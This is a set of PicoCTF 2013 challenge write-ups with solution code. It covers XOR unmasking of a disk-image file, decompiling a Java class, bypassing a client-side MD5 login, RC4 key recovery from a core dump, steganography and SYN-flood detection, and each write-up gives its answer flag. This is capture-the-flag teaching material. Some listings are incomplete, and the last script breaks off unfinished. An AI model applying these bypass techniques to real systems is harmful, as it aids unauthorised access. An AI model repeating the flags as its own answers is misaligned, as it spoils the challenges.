/pico-ctf-2013/black-hole/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Black Hole
2 |
3 | **Category:** Forensic
4 | **Points:** 115
5 | **Description:**
6 |
7 | > Near the galactic core, you find a beacon indicating that an ancient civilization hid one of their worlds [within a nearby black hole](https://2013.picoctf.com/problems/blackhole.img). Is this what passes for intergalactic humor, or is there actually something in there?
8 | >
9 | > The disk image can be found on the shell machines at `/problems/blackhole.img` and the contents of the image are available in `/problems/blackhole/`
10 | >
11 | > [Offline file](blackhole.img)
12 |
13 | ## Write-up
14 |
15 | The first step is to obtain our masked_key.png file from blackhole.img.
16 |
17 | After mounting the image, we see a directory that appears to be named “???”. However, using the hint we run “ls -b” and see that it is actually three tabs. We type cd * to enter the directory. (Hint: type echo * to see why this works.)
18 |
19 | Once inside, we copy the file out.
20 |
21 | 
22 |
23 | At the end of the file, the string “EVENT HORIZON EVENT HORIZON” is repeated a few times… strange. And at the beginning of the file, we see traces of the event horizon as well:
24 |
25 | ```
26 | \blackhole # hexdump -C masked_key.png | head -n 4
27 | 00000000 76 88 b1 a7 0d 1a 50 4c 49 46 00 48 1f 0d 0a 06 |v.....PLIF.H....|
28 | 00000010 48 4f 50 a7 5a 4f 4c 78 4d 50 45 4e 54 75 c1 31 |HOP.ZOLxMPENTu.1|
29 | 00000020 eb 5a 4f 4e 24 36 14 0c 1a 5c 40 47 5a 35 52 2b |.ZON$6...\@GZ5R+|
30 | 00000030 c6 20 45 76 45 07 10 09 1b 2a d5 0e f3 97 50 bc |. EvE....*....P.|
31 | ```
32 |
33 | Very strange. We have reason to believe that this is a PNG file, so on a hunch I decided to XOR the first few bytes of the file with the PNG header.
34 |
35 | ```
36 | Masked:
37 | 76 88 B1 A7 0D 1A 50 4C
38 | PNG:
39 | 89 50 4E 47 0D 0A 1A 0A
40 | XOR:
41 | FF D8 FF E0 00 10 4A 46
42 | ```
43 |
44 | This sequence appears in the file at the start of its last 64 bytes.
45 |
46 | ```
47 | 000effc0 ff d8 ff e0 00 10 4a 46 49 46 00 45 56 45 4e 54 |......JFIF.EVENT|
48 | 000effd0 48 4f 52 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 |HORIZON EVENTHOR|
49 | 000effe0 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f |IZON EVENTHORIZO|
50 | 000efff0 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f 4e ff d9 |N EVENTHORIZON..|
51 | ```
52 |
53 | We XOR the rest of the file with those last 64 bytes, used as a repeating mask:
54 |
55 | ```
56 | Python 3.2.3 (default, Oct 24 2012, 19:34:37)
57 | [GCC 4.5.4] on linux2
58 | Type "help", "copyright", "credits" or "license" for more information.
59 | >>> mask_in = open('masked_key.png','rb')
60 | >>> key = bytearray(mask_in.read(983040-64))
61 | >>> mask= bytearray(mask_in.read(64))
62 | >>> for x in range(983040-64):
63 | ...     key[x] ^= mask[x%64]
64 | ...
65 | >>> key_out = open('unmasked_key.png','wb')
66 | >>> key_out.write(key)
67 | 982976
68 | >>> key_out.close()
69 | >>>
70 | ```
71 |
72 | And out pops the key!
73 |
74 | 
75 |
76 | **Answer:** Hacking Radiation
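
The known-plaintext step above can be checked before unmasking the whole file: derive the mask prefix from the PNG signature, locate the 64-byte mask in the trailer, and confirm that the unmasked header parses as a valid IHDR chunk. The Python 3 code below is an added example, not part of the original write-up; its byte strings are copied from the hexdumps shown above, and the function names are this example's own.

```python
"""Known-plaintext recovery of a repeating XOR mask (added example)."""
import struct

PNG_SIGNATURE = bytes.fromhex("89 50 4e 47 0d 0a 1a 0a")

# First 32 bytes of masked_key.png, from the write-up's first hexdump.
MASKED_HEAD = bytes.fromhex(
    "76 88 b1 a7 0d 1a 50 4c 49 46 00 48 1f 0d 0a 06 "
    "48 4f 50 a7 5a 4f 4c 78 4d 50 45 4e 54 75 c1 31"
)

# Last 64 bytes of masked_key.png (offset 0xeffc0), from the later hexdump.
TRAILER = bytes.fromhex(
    "ff d8 ff e0 00 10 4a 46 49 46 00 45 56 45 4e 54 "
    "48 4f 52 49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 "
    "49 5a 4f 4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f "
    "4e 20 45 56 45 4e 54 48 4f 52 49 5a 4f 4e ff d9"
)


def recover_key_prefix(masked_head, known_plaintext):
    """XOR masked bytes with the plaintext expected at the same offsets."""
    return bytes(m ^ p for m, p in zip(masked_head, known_plaintext))


def find_key_block(tail, key_prefix, block_len=64):
    """Return the block_len bytes starting at key_prefix in tail, or None."""
    pos = tail.rfind(key_prefix)
    if pos < 0 or pos + block_len > len(tail):
        return None
    return tail[pos:pos + block_len]


def unmask(data, key, offset=0):
    """XOR data with the repeating key; offset is data's position in the file."""
    return bytes(b ^ key[(offset + i) % len(key)] for i, b in enumerate(data))


def parse_ihdr(png_head):
    """Validate signature and IHDR framing, then return the image geometry."""
    if len(png_head) < 26 or png_head[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG signature")
    length, chunk_type = struct.unpack(">I4s", png_head[8:16])
    if length != 13 or chunk_type != b"IHDR":
        raise ValueError("first chunk is not a 13-byte IHDR")
    width, height, depth, color = struct.unpack(">IIBB", png_head[16:26])
    return {"width": width, "height": height,
            "bit_depth": depth, "color_type": color}


def demo():
    """Run the whole chain on the bytes quoted in the write-up."""
    prefix = recover_key_prefix(MASKED_HEAD, PNG_SIGNATURE)
    key = find_key_block(TRAILER, prefix)
    if key is None:
        raise ValueError("mask prefix not found in trailer")
    return parse_ihdr(unmask(MASKED_HEAD, key))


if __name__ == "__main__":
    print(demo())
```

A header that parses to a 13-byte IHDR with plausible dimensions is strong evidence that both the mask and its 64-byte period are right.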
77 |
78 | ## Other write-ups and resources
79 |
80 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/blackhole.img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/blackhole.img
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/solve.png
--------------------------------------------------------------------------------
/pico-ctf-2013/byte-code/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Byte Code
2 |
3 | **Category:** ACM
4 | **Points:** 70
5 | **Description:**
6 |
7 | > You need to authenticate with the guard to gain access to the loading bay! Enter the root password from the vault application to retrieve the passkey! [This](https://2013.picoctf.com/autoproblems/tmpBPWe7T.zip) class file is the executable for the vault application.
8 | >
9 | > [offline file](tmpBPWe7T.zip)
10 |
11 | ## Write-up
12 |
13 | Use a [decompiler](http://www.showmycode.com) to turn the class file back into Java code.
14 |
15 | ```java
16 | key = new char[10];
17 | key[0] = 'A';
18 | key[1] = 'o';
19 | key[2] = 'J';
20 | key[3] = 'k';
21 | key[4] = 'V';
22 | key[5] = 'h';
23 | key[6] = 'L';
24 | key[7] = 'w';
25 | key[8] = 'U';
26 | key[9] = 'R';
27 | Console console = System.console();
28 | for (String s = ""; !s.equals("ThisIsth3mag1calString4458"); // hard-coded root password
29 |         s = console.readLine("Enter password:", new Object[0]));
30 |
31 | for (int i = 0; i < key.length; i++) // prints the passkey once the loop above exits
32 |     System.out.print(key[i]);
34 |
35 | It's not difficult to see the key.
36 |
37 | **Answer:** AoJkVhLwUR
38 |
39 | ## Other write-ups and resources
40 |
41 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/byte-code/tmpBPWe7T.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/byte-code/tmpBPWe7T.zip
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: CFG to C
2 |
3 | **Category:** ACM
4 | **Points:** 70
5 | **Description:**
6 |
7 | > Wouldn't it be cool to be able to have one of these patrol drones to do your bidding?! Figure out the correct sequence of C functions from the following [control flow graphs](https://2013.picoctf.com/problems/match.html) and you should be well on your way.
8 | >
9 | > [offline file](cfg2c)
10 |
11 | ## Write-up
12 |
13 | This challenge is a code-reading exercise.
14 |
15 | **Answer:** BCDA
16 |
17 | ## Other write-ups and resources
18 |
19 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func1.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func2.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func3.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/func4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/cfg-to-c/cfg2c/func4.png
--------------------------------------------------------------------------------
/pico-ctf-2013/cfg-to-c/cfg2c/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | ASM CFG C
6 |
7 |
8 |
9 | Match the control flow graph on the left with the correct C function on the right. Submit the correct answer sequence (i.e. 'ABCD').
10 |
94 |
95 |
96 |
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Chromatophoria
2 |
3 | **Category:** Forensic
4 | **Points:** 100
5 | **Description:**
6 |
7 | > While refueling at a gas giant, you are hailed by a race of cuttlefish-people who dwell within it. [Their transmission](https://2013.picoctf.com/problems/steg.png) is entirely visual; you suspect that they may be communicating through the color values.
8 | >
9 | > [Offline file](steg.png)
10 |
11 | ## Write-up
12 |
13 | I didn't solve this challenge.
14 |
15 | Hint: [Steganography](http://www.garykessler.net/library/steganography.html)
16 |
17 | According to another write-up, it's LSB steganography.
18 |
19 | Source: [java](solve.java)
20 |
21 | **Answer:** st3g0_saurus_wr3cks
22 |
23 | ## Other write-ups and resources
24 |
25 | *
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/solve.java:
--------------------------------------------------------------------------------
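1 | import java.awt.image.BufferedImage;
2 | import java.io.BufferedWriter;
3 | import java.io.File;
4 | import java.io.FileWriter;
5 | import javax.imageio.ImageIO;
6 |
7 | class Untitled {
8 |     public static void main(String[] args) throws Exception {
9 |         BufferedImage image = ImageIO.read(new File("/Users/andy/Desktop/steg.png"));
10 |         File file = new File("/Users/andy/Desktop/loloutput.txt");
11 |         // FileWriter creates the file if it is missing; try-with-resources
12 |         // flushes and closes the writer so the bit string actually reaches disk.
13 |         try (BufferedWriter bw = new BufferedWriter(new FileWriter(file.getAbsoluteFile()))) {
14 |             // The loop headers and the low-byte read (r) were damaged in this listing
15 |             // and are reconstructed from the surviving g and b lines.
16 |             for (int y = 0; y < image.getHeight(); y++) {
17 |                 for (int x = 0; x < image.getWidth(); x++) {
18 |                     // substring(7) keeps the last of the 8 binary digits: the channel's LSB.
19 |                     String r = pad(Integer.toBinaryString(image.getRGB(x, y) & 0xFF)).substring(7);
20 |                     String g = pad(Integer.toBinaryString((image.getRGB(x, y) >> 8) & 0xFF)).substring(7);
21 |                     String b = pad(Integer.toBinaryString((image.getRGB(x, y) >> 16) & 0xFF)).substring(7);
22 |                     bw.write(b + g + r);
23 |                 }
24 |             }
25 |         }
26 |     }
27 |
28 |     // Left-pad a binary string with zeros to exactly 8 digits.
29 |     static String pad(String s) {
30 |         while (s.length() != 8) s = "0" + s;
31 |         return s;
32 |     }
33 | }
34 |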
--------------------------------------------------------------------------------
/pico-ctf-2013/chromatophoria/steg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/chromatophoria/steg.png
--------------------------------------------------------------------------------
/pico-ctf-2013/classic/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Classic
2 |
3 | **Category:** Cryptography
4 | **Points:** 70
5 | **Description:**
6 |
7 | > Someone or something stuck a random flyer on your space ship that reads:
8 | >> cslcehesehft ohrumvc zmvm scmk ht ptohmte ehbmc mxmt eufsju eumq pvm dshem mpchgq lvfymt zheu nsce p rmtohg ptk rprmv, fv bfvm vmomtegq lq ofbbft ofbrsemvhwmk effgc. qfsv ymq hc: zumt_kf_zm_jme_ef_eum_upvk_cesii
9 |
10 | ## Write-up
11 |
12 | This challenge involves decrypting a simple substitution cipher. Using the substitution cipher solver at http://quipqiup.com/index.php, we can get the solution.
13 |
14 | **Answer: when_do_we_get_to_the_hard_stuff**
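What a solver of this kind does, as an added example that is not part of the original write-up: it matches each cipher word's letter-repetition pattern against a word list and backtracks until one consistent letter mapping fits every word. The small `WORDLIST` is a constructed stand-in for a real dictionary file, and the function names are this example's own.

```python
import re

# Ciphertext from the challenge description.
CIPHERTEXT = ("cslcehesehft ohrumvc zmvm scmk ht ptohmte ehbmc mxmt eufsju eumq "
              "pvm dshem mpchgq lvfymt zheu nsce p rmtohg ptk rprmv, fv bfvm "
              "vmomtegq lq ofbbft ofbrsemvhwmk effgc. qfsv ymq hc: "
              "zumt_kf_zm_jme_ef_eum_upvk_cesii")

# Constructed stand-in for a dictionary file (an assumption of this example).
WORDLIST = """a i an ancient and are as at be broken by can ciphers code common
computerized do easily even ever get had hard has in is it just key many more
most no not of on or over paper pencil quite recently secret so some stuff
substitution than that the them then they this though times to tools used we
were what when where which with you your""".split()


def pattern(word):
    """Letter-repetition shape of a word, e.g. 'stuff' -> (0, 1, 2, 3, 3)."""
    seen = {}
    return tuple(seen.setdefault(ch, len(seen)) for ch in word)


def solve(ciphertext, wordlist):
    """Return a cipher->plain letter map under which every word is in wordlist."""
    by_pattern = {}
    for word in wordlist:
        by_pattern.setdefault(pattern(word), []).append(word)
    # Most constrained words first: fewest candidates, then longest.
    cwords = sorted(set(re.findall(r"[a-z]+", ciphertext)),
                    key=lambda c: (len(by_pattern.get(pattern(c), [])), -len(c), c))

    def extend(idx, key):
        if idx == len(cwords):
            return key
        for cand in by_pattern.get(pattern(cwords[idx]), []):
            trial = dict(key)
            for c, p in zip(cwords[idx], cand):
                # Reject a clash with an earlier choice, or two cipher letters
                # mapping to the same plain letter (the key is a bijection).
                if trial.get(c, p) != p or (c not in trial and p in trial.values()):
                    break
                trial[c] = p
            else:
                found = extend(idx + 1, trial)
                if found is not None:
                    return found
        return None  # no candidate fits: backtrack

    return extend(0, {})


def decrypt(ciphertext, key):
    """Apply the recovered map; spaces, punctuation and underscores pass through."""
    return "".join(key.get(ch, ch) for ch in ciphertext)


if __name__ == "__main__":
    print(decrypt(CIPHERTEXT, solve(CIPHERTEXT, WORDLIST)))
```

The two 12-letter words have patterns that match only one dictionary entry each, which fixes 14 letters before any guessing starts.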
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
19 |
--------------------------------------------------------------------------------
/pico-ctf-2013/client-side-is-the-best-side/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Client-Side is the Best Side
2 |
3 | **Category:** Web Vuln
4 | **Points:** 75
5 | **Description:**
6 |
7 | > Luckily the ship has a [web-based authentication system](https://2013.picoctf.com/problems/clientside.html)! Hmm…even though you don't know the password, I bet you can still get in!
8 |
9 | ## Write-up
10 |
11 | Press Ctrl+U to view the page source:
12 |
13 | ```javascript
14 | function verify() {
15 | checkpass = document.getElementById("pass").value;
16 | if (md5(checkpass) == "03318769a5ee1354f7479acc69755e7c") {
17 | alert("Correct!");
18 | document.location="./aebe515f7c62b96ad7de047c11aa3228.html";
19 | }
20 | else {
21 | alert("Incorrect password");
22 | }
23 | }
24 | ```
25 |
26 | Surprise: the page that a correct password leads to is written right there in the source, *document.location="./aebe515f7c62b96ad7de047c11aa3228.html";*
27 |
28 | Full link:
29 |
30 | https://2013.picoctf.com/problems/aebe515f7c62b96ad7de047c11aa3228.html
31 |
32 | **Answer:** cl13nt_s1d3_1s_w0rst_s1d3
33 |
34 | ## Other write-ups and resources
35 |
36 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/client-side-is-the-best-side/clientside.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | Secure Login Server
4 |
5 |
6 |
7 |
8 |
9 |
21 |
22 |
23 |
Welcome to the Secure Login Server.
24 |
Please enter your credentials to proceed
25 |
30 |
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Core Decryption
2 |
3 | **Category:** Forensic
4 | **Points:** 120
5 | **Description:**
6 |
7 | > In a ruined city on a forgotten world, you find a broken cogitator controlling access to the Vault. You have blueprints for the machine, and a stickynote attached to the monitor with the encrypted input. The machine seems to have crashed while decrypting, and generated a core dump, too. Maybe if you can get the encryption keys out of the core dump, you can decrypt the ciphertext and get the vault open... [Files available for download here](https://2013.picoctf.com/problems/core_decrypt.tar) or on the shell machine in `/problems/core_decrypt.tar`
8 | >
9 | > [Offline file](core_decrypt.tar)
10 |
11 | ## Write-up
12 |
13 | I didn't solve this challenge...
14 |
15 | Core Decryption was another one of those painful problems. It is not hard, but it is hard to find which direction you need to take. First off, you can't just run GDB with the core file.
16 | You have to compile `cryptor.c` with `gcc -m32 -g cryptor.c -o cryptor`, that is, in 32-bit mode with debugging symbols on. This is the key to getting the core dump to load. Then run the core file and the binary through GDB with the following commands:
17 |
18 | ```linux
19 | root@neuron:~$ gdb cryptor core.26474
20 | (gdb) bt
21 | #0 0x08048564 in swap (sbox=0xffffd17c "", i=-11652, j=16) at cryptor.c:7
22 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42
23 | #2 0x08048894 in main (argc=4, argv=0xffffd374) at cryptor.c:67
24 | (gdb) f 1
25 | #1 0x08048719 in crypt (inf=0x0, keyf=0xffffd17c, outf=0xf7ffda5c) at cryptor.c:42
26 | 42 tmp ^= next_prg(sbox,&i,&j);
27 | (gdb) info locals
28 | sbox = "\000\001\002\003\004\005\006\a\b\t\n\v\f\r\016\017\020\021\022\023\024\025\026\027\030\031\032\033\034\035\036\037 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\177\200\201\202\203\204\205\206\207\210\211\212\213\214\215\216\217\220\221\222\223\224\225\226\227\230\231\232\233\234\235\236\237\240\241\242\243\244\245\246\247\250\251\252\253\254\255\256\257\260\261\262\263\264\265\266\267\270\271\272\273\274\275\276\277\300\301\302\303\304\305\306\307\310\311\312\313\314\315\316\317\320\321\322\323\324\325\326\327\330\331\332\333\334\335\336\337\340\341\342\343\344\345\346\347\350\351\352\353\354\355\356\357\360\361\362\363\364\365\366\367\370\371\372\373\374\375\376\377"
29 | i = 0
30 | j = -135168078
31 | key = "\305\344L\004\273/\\\020\272u\033×L\334",
32 | tmp = 247 '\367'
33 | ```
34 |
35 | So we see that there is a key variable here. At first, we wondered what to do with it: what did "incomplete sequence" mean? We decided to ignore it, because if you refer back to the code, you know that the key will be 16 bytes long. We took the key, turned it into hex so Python wouldn't have any trouble with it, and we got our result.
36 |
37 | ```python
38 | import random, base64
39 | def crypt(data, key):
40 | x = 0
41 | box = range(256)
42 | for i in range(256):
43 | x = (x + box[i] + ord(key[i % len(key)])) % 256
44 | box[i], box[x] = box[x], box[i]
45 | x = y = 0
46 | out = []
47 | for char in data:
48 | x = (x + 1) % 256
49 | y = (y + box[x]) % 256
50 | box[x], box[y] = box[y], box[x]
51 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
52 | return ''.join(out)
53 | with open('ENCRYPTED', 'rb') as f:
54 | content = f.read()
55 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex'))
56 | ```
57 |
58 | The message, decrypted with RC4, was:
59 |
60 | ```
61 | Well, assuming you're able to actually keep the secret keyfile safe, this is a legitimate way to encrypt files!
62 | Your key is: astronomy_ceremony_times
63 | ```
64 |
65 | **Answer:** astronomy_ceremony_times
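The key conversion described above, as an added example that is not code from the original write-up: it turns gdb's escaped string output into raw bytes, including the last byte that gdb reports separately as an incomplete sequence, and exercises the result with a Python 3 RC4. The `<incomplete sequence \334>` suffix in the sample is an assumption based on the write-up's mention of it and on the last byte of the hex key it uses; the function names are this example's own.

```python
import re

# The `key = ...` value for the 16-byte key. The quoted part is taken from the
# gdb listing; the trailing <incomplete sequence \334> marker is assumed (see
# the lead-in). gdb shows the bytes c3 97 as the UTF-8 character "×".
GDB_KEY = r'"\305\344L\004\273/\\\020\272u\033×L\334", <incomplete sequence \334>'

_SIMPLE = {"a": 7, "b": 8, "t": 9, "n": 10, "v": 11, "f": 12, "r": 13,
           "e": 27, "\\": 92, '"': 34, "'": 39}
_TOKEN = re.compile(r'\\([0-7]{1,3})|\\(.)|([^\\])', re.S)


def _unescape(text):
    """Decode gdb's C-style escapes; literal characters are taken as UTF-8."""
    out = bytearray()
    for octal, simple, plain in _TOKEN.findall(text):
        if octal:
            out.append(int(octal, 8))
        elif simple:
            out.append(_SIMPLE[simple])
        else:
            out += plain.encode("utf-8")
    return bytes(out)


def gdb_string_to_bytes(value):
    """Bytes of a gdb string value: the quoted part plus any incomplete tail."""
    quoted = re.search(r'"((?:\\.|[^"\\])*)"', value, re.S)
    data = _unescape(quoted.group(1))
    # A trailing byte that does not finish a UTF-8 character is printed outside
    # the quotes; it is still part of the array and must be appended.
    for tail in re.findall(r'<incomplete sequence ((?:\\[0-7]{1,3})+)>', value):
        data += _unescape(tail)
    return data


def rc4(data, key):
    """RC4 over bytes (Python 3); the same call encrypts and decrypts."""
    box = list(range(256))
    x = 0
    for i in range(256):
        x = (x + box[i] + key[i % len(key)]) % 256
        box[i], box[x] = box[x], box[i]
    x = y = 0
    out = bytearray()
    for byte in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(byte ^ box[(box[x] + box[y]) % 256])
    return bytes(out)


if __name__ == "__main__":
    print(gdb_string_to_bytes(GDB_KEY).hex())
```

Without the incomplete-sequence byte the quoted part decodes to only 15 bytes, one short of the 16-byte key the cipher code expects.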
66 |
67 | ## Other write-ups and resources
68 |
69 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/core_decrypt.tar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/core-decryption/core_decrypt.tar
--------------------------------------------------------------------------------
/pico-ctf-2013/core-decryption/solve.py:
--------------------------------------------------------------------------------
1 | import random, base64
2 | def crypt(data, key):
3 | x = 0
4 | box = range(256)
5 | for i in range(256):
6 | x = (x + box[i] + ord(key[i % len(key)])) % 256
7 | box[i], box[x] = box[x], box[i]
8 | x = y = 0
9 | out = []
10 | for char in data:
11 | x = (x + 1) % 256
12 | y = (y + box[x]) % 256
13 | box[x], box[y] = box[y], box[x]
14 | out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
15 | return ''.join(out)
16 | with open('ENCRYPTED', 'rb') as f:
17 | content = f.read()
18 | print crypt(content, 'c5e44c04bb2f5c10ba751bc3974cdcdc'.decode('hex'))
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Dark Star
2 |
3 | **Category:** Forensic
4 | **Points:** 110
5 | **Description:**
6 |
7 | > Sure are a lot of stars [out there](https://2013.picoctf.com/problems/darkstar.img)... but there's a lot of empty space for things to hide in, too.
8 | >
9 | > The disk image can be found on the shell machines at `/problems/dark_star.img` and the contents of the image are available in `/problems/dark_star/`
10 | >
11 | > [Offline file](darkstar.img)
12 |
13 | ## Write-up
14 |
15 | Use the [Autopsy](http://www.sleuthkit.org/autopsy/) tool: create a new case and import the image file into it.
16 |
17 | 
18 |
19 | ```
20 | Key: Stars hide your fires
21 | ```
22 |
23 | **Answer:** Stars hide your fires
24 |
25 | ## Other write-ups and resources
26 |
27 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/darkstar.img:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/darkstar.img
--------------------------------------------------------------------------------
/pico-ctf-2013/dark-star/solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/dark-star/solve.png
--------------------------------------------------------------------------------
/pico-ctf-2013/ddos-detection/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: DDoS Detection
2 |
3 | **Category:** Forensic
4 | **Points:** 85
5 | **Description:**
6 |
7 | > It appears a SYN-flood style DDoS has been carried out on this system. Send us a list of the IP addresses of the attackers (in any order, separated by spaces), so we can track them down and stop them.
8 | >
9 | > Pcap available to download [here](https://2013.picoctf.com/problems/syn_attack.pcap), or available to analyse online [at CloudShark](http://www.cloudshark.org/captures/88971318a309)
10 | >
11 | > [offline file](syn_attack.pcap)
12 |
13 | ## Write-up
14 |
15 | First, we have to understand what a SYN flood attack is. Simply put, the attacker sends many packets with the SYN flag set at the same time; the server can't answer them all because its timer is longer than the interval at which the packets arrive, so the server is overloaded.
16 |
17 | Open the pcap with `Wireshark > Statistics > Conversations`:
18 |
19 | 
20 |
21 | => Server (victim): 128.237.255.81
22 |
23 | Use a display filter to select all packets that belong to the attack:
24 |
25 | ```
26 | tcp && ip.dst == 128.237.255.81 && tcp.flags.syn == 1 && tcp.flags.ack == 0
27 | ```
28 |
29 | Listing the source IPs of the filtered packets gives all of the attackers' IPs:
30 |
31 | `Statistics > IP Statistics (unchanged filter)`
32 |
33 | **Answer:**
34 |
35 | ```
36 | 121.168.84.32 75.214.206.60 21.241.212.197 55.53.190.191 71.113.17.64 120.130.138.152 171.128.49.99 104.220.68.36 241.210.41.46 33.24.97.48 115.99.66.210 154.29.81.178 69.232.82.51 234.183.31.38 102.146.88.253 196.132.138.81 63.193.172.89 16.6.74.206 94.148.118.202 160.116.210.243 248.237.9.18 161.147.211.153 207.137.67.221 229.61.253.52 180.70.211.154 132.214.137.24 132.42.241.177 65.248.11.247 49.201.237.5 51.145.58.158
37 | ```
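The same selection as the display filter above, done offline in Python, as an added example that is not part of the original write-up. It goes one step beyond the filter by dropping sources that later send a bare ACK, that is, clients that completed the handshake. The capture is constructed inline; apart from the victim address taken from the write-up, all addresses are from documentation ranges.

```python
import socket
import struct
from collections import Counter

VICTIM = "128.237.255.81"  # server address identified in the write-up
SYN, ACK = 0x02, 0x10


def _frame(src, dst, sport, flags):
    """Build a constructed Ethernet/IPv4/TCP frame (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", sport, 80, 0, 0, 5 << 4, flags, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """Wrap frames in a little-endian pcap file with link type 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for n, frame in enumerate(frames):
        out += struct.pack("<IIII", n, 0, len(frame), len(frame)) + frame
    return out


# Constructed traffic: two flooding sources, one normal client, one stray SYN.
SAMPLE = build_pcap(
    [_frame("198.51.100.7", VICTIM, 40000 + i, SYN) for i in range(3)]
    + [_frame("203.0.113.9", VICTIM, 50000 + i, SYN) for i in range(2)]
    + [_frame("192.0.2.10", VICTIM, 51000, SYN),           # normal client
       _frame(VICTIM, "192.0.2.10", 80, SYN | ACK),        # server reply
       _frame("192.0.2.10", VICTIM, 51000, ACK),           # handshake completed
       _frame("198.51.100.7", "192.0.2.99", 40009, SYN)]   # other destination
)


def syn_sources(pcap, victim):
    """Count bare SYNs (SYN=1, ACK=0) sent to victim, per source address,
    leaving out sources that also completed a handshake with a bare ACK."""
    endian = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}[pcap[:4]]
    if struct.unpack(endian + "I", pcap[20:24])[0] != 1:
        raise ValueError("only Ethernet captures are handled")
    syns, acked = Counter(), set()
    pos = 24  # first record follows the 24-byte global header
    while pos + 16 <= len(pcap):
        incl_len = struct.unpack(endian + "I", pcap[pos + 8:pos + 12])[0]
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue  # not IPv4
        ihl = (frame[14] & 0x0F) * 4  # IPv4 header length in bytes
        if frame[23] != 6 or len(frame) < 14 + ihl + 14:
            continue  # not TCP, or truncated before the flags byte
        if socket.inet_ntoa(frame[30:34]) != victim:
            continue
        src = socket.inet_ntoa(frame[26:30])
        flags = frame[14 + ihl + 13]
        if flags & SYN and not flags & ACK:
            syns[src] += 1
        elif flags & ACK and not flags & SYN:
            acked.add(src)
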